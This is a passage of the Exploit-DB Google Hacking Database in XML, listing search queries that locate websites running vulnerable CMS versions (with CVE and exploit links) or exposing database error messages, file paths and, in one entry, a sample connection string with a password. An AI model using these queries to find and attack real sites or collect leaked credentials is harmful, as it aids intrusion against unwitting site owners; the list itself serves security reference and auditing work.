<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2876</id>
<link>https://www.exploit-db.com/ghdb/2876</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Website powered by Subdreamer CMS &amp; Sequel Theme Designed by indiqo.media</shortDescription>
<textualDescription>Subdreamer.v3.0.1 cms upload Vulnerability: https://www.exploit-db.com/exploits/11749</textualDescription>
<query>Website powered by Subdreamer CMS &amp; Sequel Theme Designed by indiqo.media</query>
<querystring>https://www.google.com/search?q=Website+powered+by+Subdreamer+CMS+%26+Sequel+Theme+Designed+by+indiqo.media</querystring>
<edb>https://www.exploit-db.com/exploits/11749</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1521</id>
<link>https://www.exploit-db.com/ghdb/1521</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>webwizguestbook_license.asp</shortDescription>
<textualDescription>Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability - CVE: 2003-1571: https://www.exploit-db.com/exploits/7488</textualDescription>
<query>webwizguestbook_license.asp</query>
<querystring>https://www.google.com/search?q=webwizguestbook_license.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7488</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3475</id>
<link>https://www.exploit-db.com/ghdb/3475</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Welcome to your PHPOpenChat-Installation!</shortDescription>
<textualDescription>ADODB 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection: https://www.exploit-db.com/exploits/1652</textualDescription>
<query>Welcome to your PHPOpenChat-Installation!</query>
<querystring>https://www.google.com/search?q=Welcome+to+your+PHPOpenChat-Installation!</querystring>
<edb>https://www.exploit-db.com/exploits/1652</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3127</id>
<link>https://www.exploit-db.com/ghdb/3127</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Winn ASP Guestbook from Winn.ws</shortDescription>
<textualDescription>Winn ASP Guestbook 1.01b Remote Database Disclosure - CVE: 2009-4760: https://www.exploit-db.com/exploits/8596</textualDescription>
<query>Winn ASP Guestbook from Winn.ws</query>
<querystring>https://www.google.com/search?q=Winn+ASP+Guestbook+from+Winn.ws</querystring>
<edb>https://www.exploit-db.com/exploits/8596</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3196</id>
<link>https://www.exploit-db.com/ghdb/3196</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>www.stwc-counter.de</shortDescription>
<textualDescription>STWC-Counter</textualDescription>
<query>www.stwc-counter.de</query>
<querystring>https://www.google.com/search?q=www.stwc-counter.de</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3217</id>
<link>https://www.exploit-db.com/ghdb/3217</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>[ Content Copyright © 2007 RadNics Gold ]</shortDescription>
<textualDescription>RadNICS Gold v5 Multiple Remote Vulnerabilities - CVE: 2009-4696: https://www.exploit-db.com/exploits/9196</textualDescription>
<query>[ Content Copyright © 2007 RadNics Gold ]</query>
<querystring>https://www.google.com/search?q=[+Content+Copyright+%C3%82%C2%A9+2007+RadNics+Gold+]</querystring>
<edb>https://www.exploit-db.com/exploits/9196</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2841</id>
<link>https://www.exploit-db.com/ghdb/2841</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>[ Copyright 2005-2006 phpDirectorySourceâ„¢, all rights reserved ]</shortDescription>
<textualDescription>phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4681: https://www.exploit-db.com/exploits/9226</textualDescription>
<query>[ Copyright 2005-2006 phpDirectorySourceâ„¢, all rights reserved ]</query>
<querystring>https://www.google.com/search?q=%5B+Copyright+2005-2006+phpDirectorySource%C3%A2%E2%80%9E%C2%A2%2C+all+rights+reserved+%5D</querystring>
<edb>https://www.exploit-db.com/exploits/9226</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3016</id>
<link>https://www.exploit-db.com/ghdb/3016</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>[ Powered by SkaDate dating ]</shortDescription>
<textualDescription>SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities - CVE: 2009-4700: https://www.exploit-db.com/exploits/9260</textualDescription>
<query>[ Powered by SkaDate dating ]</query>
<querystring>https://www.google.com/search?q=[+Powered+by+SkaDate+dating+]</querystring>
<edb>https://www.exploit-db.com/exploits/9260</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3242</id>
<link>https://www.exploit-db.com/ghdb/3242</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>[ Powered By x10media.com ]</shortDescription>
<textualDescription>x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities - CVE: 2009-4730: https://www.exploit-db.com/exploits/9340</textualDescription>
<query>[ Powered By x10media.com ]</query>
<querystring>https://www.google.com/search?q=[+Powered+By+x10media.com+]</querystring>
<edb>https://www.exploit-db.com/exploits/9340</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3221</id>
<link>https://www.exploit-db.com/ghdb/3221</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>[ Powered by: RadBids Gold v4 ]</shortDescription>
<textualDescription>RadBIDS GOLD v4 Multiple Remote Vulnerabilities - CVE: 2009-3529: https://www.exploit-db.com/exploits/9194</textualDescription>
<query>[ Powered by: RadBids Gold v4 ]</query>
<querystring>https://www.google.com/search?q=[+Powered+by:+RadBids+Gold+v4+]</querystring>
<edb>https://www.exploit-db.com/exploits/9194</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3197</id>
<link>https://www.exploit-db.com/ghdb/3197</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>[ Powered by: RadLance v7.5 ]</shortDescription>
<textualDescription>RadLance Gold 7.5 Multiple Remote Vulnerabilities - CVE: 2009-4692: https://www.exploit-db.com/exploits/9195</textualDescription>
<query>[ Powered by: RadLance v7.5 ]</query>
<querystring>https://www.google.com/search?q=[+Powered+by:+RadLance+v7.5+]</querystring>
<edb>https://www.exploit-db.com/exploits/9195</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3271</id>
<link>https://www.exploit-db.com/ghdb/3271</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>[ Software Directory Powered by SoftDirec 1.05 ]</shortDescription>
<textualDescription>Soft Direct v1.05 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11189</textualDescription>
<query>[ Software Directory Powered by SoftDirec 1.05 ]</query>
<querystring>https://www.google.com/search?q=[+Software+Directory+Powered+by+SoftDirec+1.05+]</querystring>
<edb>https://www.exploit-db.com/exploits/11189</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2415</id>
<link>https://www.exploit-db.com/ghdb/2415</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>[ Web Wiz Forums® version 9.64 [Free Express Edition] ]</shortDescription>
<textualDescription>Web Wiz Forums v9.64 Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/10638</textualDescription>
<query>[ Web Wiz Forums® version 9.64 [Free Express Edition] ]</query>
<querystring>https://www.google.com/search?q=[+Web+Wiz+Forums%C2%AE+version+9.64+[Free+Express+Edition]+]</querystring>
<edb>https://www.exploit-db.com/exploits/10638</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3229</id>
<link>https://www.exploit-db.com/ghdb/3229</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>© 1998 - 2010 Video Battle Script</shortDescription>
<textualDescription>PHP Video Battle SQL Injection Vulnerability - CVE: 2010-1701: https://www.exploit-db.com/exploits/12444</textualDescription>
<query>© 1998 - 2010 Video Battle Script</query>
<querystring>https://www.google.com/search?q=%C2%A9+1998+-+2010+Video+Battle+Script</querystring>
<edb>https://www.exploit-db.com/exploits/12444</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3021</id>
<link>https://www.exploit-db.com/ghdb/3021</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>© 2010 Powered by Subrion CMS</shortDescription>
<textualDescription>Subrion Auto Classifieds Persistent Xss Vulnerability: https://www.exploit-db.com/exploits/14391</textualDescription>
<query>© 2010 Powered by Subrion CMS</query>
<querystring>https://www.google.com/search?q=%C2%A9+2010+Powered+by+Subrion+CMS</querystring>
<edb>https://www.exploit-db.com/exploits/14391</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2987</id>
<link>https://www.exploit-db.com/ghdb/2987</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>© Powered by sijio - Community Software</shortDescription>
<textualDescription>Sijio Community Software SQL Injection/Persistent XSS Vulnerability - CVE: 2010-2696: https://www.exploit-db.com/exploits/14260</textualDescription>
<query>© Powered by sijio - Community Software</query>
<querystring>https://www.google.com/search?q=%C2%A9+Powered+by+sijio+-+Community+Software</querystring>
<edb>https://www.exploit-db.com/exploits/14260</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4487</id>
<link>https://www.exploit-db.com/ghdb/4487</link>
<category>Error Messages</category>
<shortDescription>&quot;--- WebView Livescope Http Server Error ---&quot; -git</shortDescription>
<textualDescription>WebView server errors, mostly found on older servers
Dxtroyer</textualDescription>
<query>&quot;--- WebView Livescope Http Server Error ---&quot; -git</query>
<querystring>https://www.google.com/search?q=&quot;--- WebView Livescope Http Server Error ---&quot; -git</querystring>
<edb></edb>
<date>2017-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>91</id>
<link>https://www.exploit-db.com/ghdb/91</link>
<category>Error Messages</category>
<shortDescription>&quot;A syntax error has occurred&quot; filetype:ihtml</shortDescription>
<textualDescription>An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers</textualDescription>
<query>&quot;A syntax error has occurred&quot; filetype:ihtml</query>
<querystring>https://www.google.com/search?q=%22A+syntax+error+has+occurred%22+filetype%3Aihtml</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>105</id>
<link>https://www.exploit-db.com/ghdb/105</link>
<category>Error Messages</category>
<shortDescription>&quot;access denied for user&quot; &quot;using password&quot;</shortDescription>
<textualDescription>Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;access denied for user&quot; &quot;using password&quot;</query>
<querystring>https://www.google.com/search?q=%22access+denied+for+user%22+%22using+password%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>90</id>
<link>https://www.exploit-db.com/ghdb/90</link>
<category>Error Messages</category>
<shortDescription>&quot;An illegal character has been found in the statement&quot; -&quot;previous message&quot;</shortDescription>
<textualDescription>An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;An illegal character has been found in the statement&quot; -&quot;previous message&quot;</query>
<querystring>https://www.google.com/search?q=%22An+illegal+character+has+been+found+in+the+statement%22+-%22previous+message%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>381</id>
<link>https://www.exploit-db.com/ghdb/381</link>
<category>Error Messages</category>
<shortDescription>&quot;ASP.NET_SessionId&quot; &quot;data source=&quot;</shortDescription>
<textualDescription>.NET pages revealing their datasource and sometimes the authentication credentials with it. The complete debug line looks something like this for example:strConn System.String Provider=sqloledb;Network Library=DBMSSOCN;Data Source=ch-sql-91;Initial Catalog=DBLive;User Id=login-orsearch;Password=0aX(v5~di)&gt;S$+*For quick fun an attacker could modify this search to find those who use Microsoft Access as their storage: It will not suprise the experienced security digger that these files are often in a downloadeble location on the server.</textualDescription>
<query>&quot;ASP.NET_SessionId&quot; &quot;data source=&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22ASP.NET_SessionId%22+%22data+source%3D%22</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4411</id>
<link>https://www.exploit-db.com/ghdb/4411</link>
<category>Error Messages</category>
<shortDescription>&quot;Below is a rendering of the page up to the first error.&quot; ext:xml</shortDescription>
<textualDescription>Some nice error messages that give you WAY too much info.
Dxtroyer</textualDescription>
<query>&quot;Below is a rendering of the page up to the first error.&quot; ext:xml</query>
<querystring>https://www.google.com/search?q=&quot;Below is a rendering of the page up to the first error.&quot; ext:xml</querystring>
<edb></edb>
<date>2017-03-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4622</id>
<link>https://www.exploit-db.com/ghdb/4622</link>
<category>Error Messages</category>
<shortDescription>&quot;Cake\Routing\Exception\&quot; -site:github.com -site:stackoverflow.com -site:cakephp.org&quot;</shortDescription>
<textualDescription>To find out websites made with CakePHP Framework
Thanks
Kiran S
</textualDescription>
<query>&quot;CakeRoutingException&quot; -site:github.com -site:stackoverflow.com -site:cakephp.org&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Cake\Routing\Exception\&quot; -site:github.com -site:stackoverflow.com -site:cakephp.org&quot;</querystring>
<edb></edb>
<date>2017-11-27</date>
<author>Kiran S</author>
</entry>
<entry>
<id>110</id>
<link>https://www.exploit-db.com/ghdb/110</link>
<category>Error Messages</category>
<shortDescription>&quot;Can't connect to local&quot; intitle:warning</shortDescription>
<textualDescription>Another SQL error message, this message can display database name, path names and partial SQL code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;Can't connect to local&quot; intitle:warning</query>
<querystring>https://www.google.com/search?q=%22Can%27t+connect+to+local%22+intitle%3Awarning</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>3797</id>
<link>https://www.exploit-db.com/ghdb/3797</link>
<category>Error Messages</category>
<shortDescription>&quot;CHARACTER_SETS&quot; &quot;COLLATION_CHARACTER_SET_APPLICABILITY&quot;</shortDescription>
<textualDescription>&quot;CHARACTER_SETS&quot;+&quot;COLLATION_CHARACTER_SET_APPLICABILITY&quot;
find sql injectable site
discoverd by shinrisama</textualDescription>
<query>&quot;CHARACTER_SETS&quot; &quot;COLLATION_CHARACTER_SET_APPLICABILITY&quot;</query>
<querystring>https://www.google.com/search?q=&quot;CHARACTER_SETS&quot; &quot;COLLATION_CHARACTER_SET_APPLICABILITY&quot;</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>53</id>
<link>https://www.exploit-db.com/ghdb/53</link>
<category>Error Messages</category>
<shortDescription>&quot;Chatologica MetaSearch&quot; &quot;stack tracking&quot;</shortDescription>
<textualDescription>There is soo much crap in this error message... Apache version, CGI environment vars, path names, stack-freaking-dumps, process ID's, perl version, yadda yadda yadda...</textualDescription>
<query>&quot;Chatologica MetaSearch&quot; &quot;stack tracking:&quot;</query>
<querystring>https://www.google.com/search?q=%22Chatologica+MetaSearch%22+%22stack+tracking%3A%22</querystring>
<edb></edb>
<date>2003-08-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>92</id>
<link>https://www.exploit-db.com/ghdb/92</link>
<category>Error Messages</category>
<shortDescription>&quot;detected an internal error [IBM][CLI Driver][DB2/6000]&quot;</shortDescription>
<textualDescription>A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers...</textualDescription>
<query>&quot;detected an internal error [IBM][CLI Driver][DB2/6000]&quot;</query>
<querystring>https://www.google.com/search?q=%22detected+an+internal+error+%5BIBM%5D%5BCLI+Driver%5D%5BDB2%2F6000%5D%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5064</id>
<link>https://www.exploit-db.com/ghdb/5064</link>
<category>Error Messages</category>
<shortDescription>&quot;dispatch=debugger.&quot;</shortDescription>
<textualDescription># Exploit Title: CS-Cart debug and configuration information
# Google Dork:
&quot;dispatch=debugger.&quot;
# Date: 28, Dec, 2018
# Vendor Homepage:
https://www.cs-cart.com/
# Exploit Author: deadroot</textualDescription>
<query>&quot;dispatch=debugger.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;dispatch=debugger.&quot;</querystring>
<edb></edb>
<date>2019-01-02</date>
<author>deadroot</author>
</entry>
<entry>
<id>247</id>
<link>https://www.exploit-db.com/ghdb/247</link>
<category>Error Messages</category>
<shortDescription>&quot;error found handling the request&quot; cocoon filetype:xml</shortDescription>
<textualDescription>Cocoon is an XML publishing framework. It allows you to define XML documents and transformations to be applied on it, to eventually generate a presentation format of your choice (HTML, PDF, SVG). For more information read http://cocoon.apache.org/2.1/overview.htmlThis Cocoon error displays library functions, cocoon version number, and full and/or relative path names.</textualDescription>
<query>&quot;error found handling the request&quot; cocoon filetype:xml</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22error+found+handling+the+request%22+cocoon+filetype%3Axml</querystring>
<edb></edb>
<date>2004-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>126</id>
<link>https://www.exploit-db.com/ghdb/126</link>
<category>Error Messages</category>
<shortDescription>&quot;Fatal error: Call to undefined function&quot; -reply -the -next</shortDescription>
<textualDescription>This error message can reveal information such as compiler used, language used, line numbers, program names and partial source code.</textualDescription>
<query>&quot;Fatal error: Call to undefined function&quot; -reply -the -next</query>
<querystring>https://www.google.com/search?q=%22Fatal+error:+Call+to+undefined+function%22+-reply+-the+-next&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2004-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>85</id>
<link>https://www.exploit-db.com/ghdb/85</link>
<category>Error Messages</category>
<shortDescription>&quot;Incorrect syntax near&quot;</shortDescription>
<textualDescription>An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;Incorrect syntax near&quot;</query>
<querystring>https://www.google.com/search?q=%22Incorrect+syntax+near%22&amp;start=90&amp;sa=N</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>86</id>
<link>https://www.exploit-db.com/ghdb/86</link>
<category>Error Messages</category>
<shortDescription>&quot;Incorrect syntax near&quot;</shortDescription>
<textualDescription>An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;Incorrect syntax near&quot; -the</query>
<querystring>https://www.google.com/search?q=%22Incorrect+syntax+near%22+-the</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>332</id>
<link>https://www.exploit-db.com/ghdb/332</link>
<category>Error Messages</category>
<shortDescription>&quot;Internal Server Error&quot; &quot;server at&quot;</shortDescription>
<textualDescription>We have a similar search already, but it relies on &quot;500 Internal Server&quot; which doesn't appear on all errors like this one. It reveals the server administrator's email address, as well as a nice server banner for Apache servers. As a bonus, the webmaster may have posted this error on a forum which may reveal (parts of) the source code.</textualDescription>
<query>&quot;Internal Server Error&quot; &quot;server at&quot;</query>
<querystring>https://www.google.com/search?q=%22Internal+Server+Error%22+%22server+at%22</querystring>
<edb></edb>
<date>2004-07-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>258</id>
<link>https://www.exploit-db.com/ghdb/258</link>
<category>Error Messages</category>
<shortDescription>&quot;Invision Power Board Database Error&quot;</shortDescription>
<textualDescription>These are SQL error messages, ranging from to many connections, access denied to user xxx, showing full path info to the php files etc.. There is an exploitable bug in version 1.1 of this software and the current version is 1.3 available for download on the site.</textualDescription>
<query>&quot;Invision Power Board Database Error&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Invision+Power+Board+Database+Error%22</querystring>
<edb></edb>
<date>2004-05-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>7290</id>
<link>https://www.exploit-db.com/ghdb/7290</link>
<category>Error Messages</category>
<shortDescription>&quot;Lucee&quot; &quot;Error (expression)&quot; -lucee.org</shortDescription>
<textualDescription># Google Dork: &quot;Lucee&quot; &quot;Error (expression)&quot; -lucee.org
# Error Messages
# Date:19/07/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>&quot;Lucee&quot; &quot;Error (expression)&quot; -lucee.org</query>
<querystring>https://www.google.com/search?q=&quot;Lucee&quot; &quot;Error (expression)&quot; -lucee.org</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>83</id>
<link>https://www.exploit-db.com/ghdb/83</link>
<category>Error Messages</category>
<shortDescription>&quot;ORA-00933: SQL command not properly ended&quot;</shortDescription>
<textualDescription>An Oracle error message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;ORA-00933: SQL command not properly ended&quot;</query>
<querystring>https://www.google.com/search?q=%22ORA-00933%3A+SQL+command+not+properly+ended%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>341</id>
<link>https://www.exploit-db.com/ghdb/341</link>
<category>Error Messages</category>
<shortDescription>&quot;ORA-12541: TNS:no listener&quot; intitle:&quot;error occurred&quot;</shortDescription>
<textualDescription>In many cases, these pages display nice bits of SQL code which can be used by an attacker to mount attacks against the SQL database itself. Other pieces of information revealed include path names, file names, and data sources.</textualDescription>
<query>&quot;ORA-12541: TNS:no listener&quot; intitle:&quot;error occurred&quot;</query>
<querystring>https://www.google.com/search?q=%22ORA-12541:+TNS:no+listener%22+intitle:%22error+occurred%22&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-07-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>943</id>
<link>https://www.exploit-db.com/ghdb/943</link>
<category>Error Messages</category>
<shortDescription>&quot;Parse error: parse error, unexpected T_VARIABLE&quot; &quot;on line&quot; filetype:php</shortDescription>
<textualDescription>PHP error with a full web root path disclosure</textualDescription>
<query>&quot;Parse error: parse error, unexpected T_VARIABLE&quot; &quot;on line&quot; filetype:php</query>
<querystring>https://www.google.com/search?q=%22Parse+error:+parse+error,+unexpected+T_VARIABLE%22+%22on+line%22+filetype:php</querystring>
<edb></edb>
<date>2005-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>3638</id>
<link>https://www.exploit-db.com/ghdb/3638</link>
<category>Error Messages</category>
<shortDescription>&quot;plugins/wp-db-backup/wp-db-backup.php&quot;</shortDescription>
<textualDescription>Many of the results of the search show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. Author: ScOrPiOn</textualDescription>
<query>&quot;plugins/wp-db-backup/wp-db-backup.php&quot;</query>
<querystring>https://www.google.com/search?q=%22plugins/wp-db-backup/wp-db-backup.php%22</querystring>
<edb></edb>
<date>2010-12-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>87</id>
<link>https://www.exploit-db.com/ghdb/87</link>
<category>Error Messages</category>
<shortDescription>&quot;PostgreSQL query failed: ERROR: parser: parse error&quot;</shortDescription>
<textualDescription>An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;PostgreSQL query failed: ERROR: parser: parse error&quot;</query>
<querystring>https://www.google.com/search?q=%22PostgreSQL+query+failed%3A++ERROR%3A++parser%3A+parse+error%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>80</id>
<link>https://www.exploit-db.com/ghdb/80</link>
<category>Error Messages</category>
<shortDescription>&quot;Supplied argument is not a valid MySQL result resource&quot;</shortDescription>
<textualDescription>Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;Supplied argument is not a valid MySQL result resource&quot;</query>
<querystring>https://www.google.com/search?q=%22Supplied+argument+is+not+a+valid+MySQL+result+resource%22&amp;start=90&amp;sa=N</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5033</id>
<link>https://www.exploit-db.com/ghdb/5033</link>
<category>Error Messages</category>
<shortDescription>&quot;syd_apply.cfm&quot;</shortDescription>
<textualDescription>Find error pages for job applications, sometimes can contain juicy
information.
~ CrimsonTorso
</textualDescription>
<query>&quot;syd_apply.cfm&quot;</query>
<querystring>https://www.google.com/search?q=&quot;syd_apply.cfm&quot;</querystring>
<edb></edb>
<date>2018-11-21</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>89</id>
<link>https://www.exploit-db.com/ghdb/89</link>
<category>Error Messages</category>
<shortDescription>&quot;Syntax error in query expression &quot; -the</shortDescription>
<textualDescription>An Access error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;Syntax error in query expression &quot; -the</query>
<querystring>https://www.google.com/search?q=%22Syntax+error+in+query+expression+%22+-the&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>578</id>
<link>https://www.exploit-db.com/ghdb/578</link>
<category>Error Messages</category>
<shortDescription>&quot;The script whose uid is &quot; &quot;is not allowed to access&quot;</shortDescription>
<textualDescription>This PHP error message is revealing the webserver's directory and user ID.</textualDescription>
<query>&quot;The script whose uid is &quot; &quot;is not allowed to access&quot;</query>
<querystring>https://www.google.com/search?q=%22The+script+whose+uid+is+%22+%22is+not+allowed+to+access%22&amp;client=firefox-a</querystring>
<edb></edb>
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1075</id>
<link>https://www.exploit-db.com/ghdb/1075</link>
<category>Error Messages</category>
<shortDescription>&quot;There seems to have been a problem with the&quot; &quot; Please try again by clicking the Refresh button in your web browser.&quot;</shortDescription>
<textualDescription>search reveals database errors on vbulletin sites. View the page source and you can get information about the sql query executed, this can help in all manner of ways depending on the query.</textualDescription>
<query>&quot;There seems to have been a problem with the&quot; &quot; Please try again by clicking the Refresh button in your web browser.&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22There+seems+to+have+been+a+problem+with+the%22+%22+Please+try+again+by+clicking+the+Refresh+button+in+your+web+browser.%22</querystring>
<edb></edb>
<date>2005-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1344</id>
<link>https://www.exploit-db.com/ghdb/1344</link>
<category>Error Messages</category>
<shortDescription>&quot;Unable to jump to row&quot; &quot;on MySQL result index&quot; &quot;on line&quot;</shortDescription>
<textualDescription>another error message</textualDescription>
<query>&quot;Unable to jump to row&quot; &quot;on MySQL result index&quot; &quot;on line&quot;</query>
<querystring>https://www.google.com/search?q=%22Unable+to+jump+to+row%22+%22on+MySQL+result+index%22+%22on+line%22&amp;num=100&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>84</id>
<link>https://www.exploit-db.com/ghdb/84</link>
<category>Error Messages</category>
<shortDescription>&quot;Unclosed quotation mark before the character string&quot;</shortDescription>
<textualDescription>An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;Unclosed quotation mark before the character string&quot;</query>
<querystring>https://www.google.com/search?q=%22Unclosed+quotation+mark+before+the+character+string%22&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>1343</id>
<link>https://www.exploit-db.com/ghdb/1343</link>
<category>Error Messages</category>
<shortDescription>&quot;Warning: Bad arguments to (join|implode) () in&quot; &quot;on line&quot; -help -forum</shortDescription>
<textualDescription>and another error. open it from cache when not working.</textualDescription>
<query>&quot;Warning: Bad arguments to (join|implode) () in&quot; &quot;on line&quot; -help -forum</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Warning%3A+Bad+arguments+to+%28join%7Cimplode%29+%28%29+in%22+%22on+line%22+-help+-forum</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>101</id>
<link>https://www.exploit-db.com/ghdb/101</link>
<category>Error Messages</category>
<shortDescription>&quot;Warning: Cannot modify header information - headers already sent&quot;</shortDescription>
<textualDescription>A PHP error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers...</textualDescription>
<query>&quot;Warning: Cannot modify header information - headers already sent&quot;</query>
<querystring>https://www.google.com/search?q=%22Warning%3A+Cannot+modify+header+information+%2D+headers+already+sent%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>1339</id>
<link>https://www.exploit-db.com/ghdb/1339</link>
<category>Error Messages</category>
<shortDescription>&quot;Warning: Division by zero in&quot; &quot;on line&quot; -forum</shortDescription>
<textualDescription>Just another error that reveals full paths.</textualDescription>
<query>&quot;Warning: Division by zero in&quot; &quot;on line&quot; -forum</query>
<querystring>https://www.google.com/search?q=%22Warning:+Division+by+zero+in%22+%22on+line%22+-forum&amp;num=100&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1341</id>
<link>https://www.exploit-db.com/ghdb/1341</link>
<category>Error Messages</category>
<shortDescription>&quot;Warning: mysql_connect(): Access denied for user: '*@*&quot; &quot;on line&quot; -help -forum</shortDescription>
<textualDescription>This dork reveals logins to databases that were denied for some reason.</textualDescription>
<query>&quot;Warning: mysql_connect(): Access denied for user: '*@*&quot; &quot;on line&quot; -help -forum</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Warning%3A+mysql_connect%28%29%3A+Access+denied+for+user%3A+%27*%40*%22+%22on+line%22++-help+-forum</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
